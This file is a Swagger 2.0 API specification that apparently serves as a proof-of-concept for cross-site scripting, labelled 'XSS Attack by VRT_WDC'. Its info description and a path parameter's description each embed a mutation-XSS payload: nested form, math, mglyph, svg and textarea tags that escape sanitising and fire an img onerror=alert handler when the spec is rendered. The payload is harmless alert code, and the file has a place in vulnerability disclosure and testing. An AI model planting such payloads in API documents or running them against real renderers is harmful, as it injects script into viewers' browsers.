swagger: '2.0'
info:
  title: XSS Attack by VRT_WDC
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('VRT_WDC') src=1>"></form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /VRTWDC:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - VRT_WDC
      operationId: findAccounts
      summary: WDC POC
  '/vrt/wdc/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('VRT_WDC') src=1>"></form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
